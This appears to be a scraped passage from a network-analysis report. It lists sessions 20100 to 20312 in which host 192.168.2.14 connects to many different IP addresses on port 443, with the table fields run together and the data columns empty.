                                                        20100192.168.2.1458582221.194.220.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20101192.168.2.1454772200.191.245.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20102192.168.2.1447588169.116.29.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20103192.168.2.1436568156.122.101.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20104192.168.2.1440786159.6.18.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20105192.168.2.1439512141.240.166.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20106192.168.2.1452730115.193.17.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20107192.168.2.143801878.125.36.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20108192.168.2.1445448195.138.222.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20109192.168.2.145068845.239.215.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20110192.168.2.143457866.153.217.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20111192.168.2.1444798180.148.44.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20112192.168.2.1456556189.105.123.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20113192.168.2.144412636.206.220.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20114192.168.2.145958257.156.153.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20115192.168.2.1449320111.105.164.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20116192.168.2.14385088.121.88.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20117192.168.2.145356491.177.203.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20118192.168.2.1451990161.181.48.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20119192.168.2.143506217.74.231.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20120192.168.2.1440088186.39.89.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20121192.168.2.1437638169.41.59.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20122192.168.2.1441096108.85.29.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20123192.168.2.145148498.38.141.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20124192.168.2.144349457.20.14.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20125192.168.2.1458414197.129.191.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20126192.168.2.144001274.191.196.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20127192.168.2.1442904141.218.85.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20128192.168.2.1453682160.64.40.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20129192.168.2.1446398197.21.0.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20130192.168.2.145248271.238.1.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20131192.168.2.145858620.114.73.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20132192.168.2.14420402.106.159.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20133192.168.2.145880635.169.142.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20134192.168.2.143997267.112.162.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20135192.168.2.143440861.197.170.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20136192.168.2.1447442128.15.20.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20137192.168.2.1445488128.56.65.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20138192.168.2.1441010123.173.169.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20139192.168.2.144038895.152.242.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20140192.168.2.144048861.121.43.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20141192.168.2.145636486.123.72.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20142192.168.2.1452040132.132.130.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20143192.168.2.144084260.187.119.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20144192.168.2.1454242164.235.140.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20145192.168.2.144793644.47.196.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20146192.168.2.143574287.137.26.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20147192.168.2.1449806112.18.189.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20148192.168.2.143520849.182.22.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20149192.168.2.145123859.194.167.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20150192.168.2.144661825.140.25.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20151192.168.2.1436694176.153.214.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20152192.168.2.1435516193.182.50.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20153192.168.2.1453364170.242.110.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20154192.168.2.1444004128.193.97.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20155192.168.2.145976272.238.144.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20156192.168.2.1437034200.76.62.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20157192.168.2.1438816157.120.64.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20158192.168.2.144459863.171.129.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20159192.168.2.1450946156.59.110.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20160192.168.2.144727460.89.242.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20161192.168.2.145812497.233.83.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20162192.168.2.144002890.7.140.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20163192.168.2.1437764132.220.251.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20164192.168.2.1460094128.100.81.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20165192.168.2.14331342.150.214.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20166192.168.2.1451450147.106.50.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20167192.168.2.145697468.27.183.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20168192.168.2.144851654.9.53.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20169192.168.2.1436262198.253.6.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20170192.168.2.1460910182.23.17.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20171192.168.2.144652460.237.120.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20172192.168.2.1443194116.24.65.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20173192.168.2.1438306185.201.140.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20174192.168.2.1448504160.35.50.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20175192.168.2.1446158203.127.216.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20176192.168.2.1437048146.194.28.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20177192.168.2.14442505.50.26.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20178192.168.2.144377288.247.170.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20179192.168.2.1444178173.162.123.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20180192.168.2.1439456213.140.80.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20181192.168.2.1440836165.174.219.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20182192.168.2.1438846222.52.14.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20183192.168.2.1443176208.127.51.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20184192.168.2.145736295.119.165.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20185192.168.2.1439118222.116.8.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20186192.168.2.144277277.202.247.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20187192.168.2.143726854.223.108.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20188192.168.2.144593890.223.3.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20189192.168.2.1458786121.164.232.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20190192.168.2.144475471.113.103.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20191192.168.2.1452774112.51.157.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192192.168.2.1451040135.54.188.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20193192.168.2.1439496140.84.136.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20194192.168.2.1444308176.233.230.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20195192.168.2.145525253.85.199.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20196192.168.2.1441798166.169.96.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20197192.168.2.1451844133.129.193.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20198192.168.2.143821853.104.4.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20199192.168.2.14411641.123.245.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20200192.168.2.143724652.228.125.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20201192.168.2.1442730112.225.210.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20202192.168.2.1448398183.134.49.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20203192.168.2.1438920204.12.82.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20204192.168.2.144428618.24.238.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20205192.168.2.143730874.120.8.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20206192.168.2.144143059.22.37.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20207192.168.2.1446842104.68.221.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20208192.168.2.1457918164.240.34.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20209192.168.2.1435404152.177.26.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20210192.168.2.1459220176.116.27.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20211192.168.2.1451624208.31.227.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20212192.168.2.145699887.81.132.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20213192.168.2.1445228173.134.20.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20214192.168.2.145576659.242.111.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20215192.168.2.1437702159.35.47.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20216192.168.2.1454208161.198.206.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20217192.168.2.1446638114.235.214.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20218192.168.2.1449398101.13.24.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20219192.168.2.1448560121.18.67.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20220192.168.2.143883262.118.223.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20221192.168.2.145640484.8.0.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20222192.168.2.1446758125.114.80.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20223192.168.2.143312277.87.161.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20224192.168.2.145204491.115.54.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20225192.168.2.145226451.170.234.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20226192.168.2.1433348112.155.218.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20227192.168.2.1447758150.158.130.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20228192.168.2.143715666.144.42.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20229192.168.2.143950466.255.129.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20230192.168.2.1459328208.25.27.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20231192.168.2.144208040.164.1.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20232192.168.2.1435420149.134.208.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20233192.168.2.1458480152.195.218.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20234192.168.2.1443548177.46.174.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20235192.168.2.144107096.79.82.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20236192.168.2.145558259.86.23.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20237192.168.2.143368237.222.232.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20238192.168.2.145091252.242.162.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20239192.168.2.1448622147.231.238.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20240192.168.2.1455366164.147.16.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20241192.168.2.144695613.221.164.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20242192.168.2.144105279.222.246.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20243192.168.2.1457970144.206.61.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20244192.168.2.1448244201.120.105.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20245192.168.2.145746888.182.179.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20246192.168.2.145956678.185.115.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20247192.168.2.1459116183.162.234.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20248192.168.2.1435036196.45.87.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20249192.168.2.144353217.117.100.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20250192.168.2.1442276128.94.150.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20251192.168.2.145822499.15.60.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20252192.168.2.144083253.197.218.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20253192.168.2.1454114120.80.148.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20254192.168.2.1451872116.18.160.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20255192.168.2.144982837.117.192.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20256192.168.2.143741278.156.199.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20257192.168.2.144219812.79.213.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20258192.168.2.145633631.77.201.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20259192.168.2.145036093.5.147.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20260192.168.2.145276680.227.189.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20261192.168.2.143751624.114.141.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20262192.168.2.145550075.48.161.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20263192.168.2.1444840152.132.1.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20264192.168.2.1445812188.163.35.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20265192.168.2.1456374141.5.1.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20266192.168.2.1448316197.238.202.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20267192.168.2.1435556189.119.67.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20268192.168.2.144127665.34.38.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20269192.168.2.1456350154.135.64.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20270192.168.2.1451242140.150.164.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20271192.168.2.145588694.215.151.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20272192.168.2.144623448.68.23.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20273192.168.2.145385093.166.89.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20274192.168.2.1438764115.211.214.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20275192.168.2.1439366202.60.230.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20276192.168.2.1441212106.20.105.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20277192.168.2.1457398174.9.87.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20278192.168.2.14443889.7.58.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20279192.168.2.144758878.119.178.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20280192.168.2.145500467.66.72.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20281192.168.2.1439926188.26.114.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20282192.168.2.143625265.170.97.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20283192.168.2.144712679.8.126.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20284192.168.2.145231818.47.232.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20285192.168.2.1448966117.194.193.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20286192.168.2.143498249.130.207.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20287192.168.2.143693657.252.156.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20288192.168.2.1451076158.218.25.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20289192.168.2.1448102133.202.102.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20290192.168.2.1449452180.2.170.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20291192.168.2.144218267.252.30.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20292192.168.2.144581046.90.110.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20293192.168.2.1455216176.14.147.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20294192.168.2.143545032.245.194.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20295192.168.2.145016884.17.173.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20296192.168.2.1445886147.130.118.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20297192.168.2.1437508208.143.184.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20298192.168.2.1435626116.180.20.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20299192.168.2.1449022148.56.42.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20300192.168.2.143923683.88.249.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20301192.168.2.1458746131.8.183.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20302192.168.2.1450858148.0.0.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20303192.168.2.1455926177.190.141.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20304192.168.2.1432780144.186.6.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20305192.168.2.1440430109.3.127.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20306192.168.2.143590699.49.178.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20307192.168.2.1456794179.6.20.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20308192.168.2.145071499.150.82.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20309192.168.2.1446332152.72.134.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20310192.168.2.1438318187.140.96.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20311192.168.2.145218072.63.34.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20312192.168.2.14522028.72.150.109443
                                                        TimestampBytes transferredDirectionData


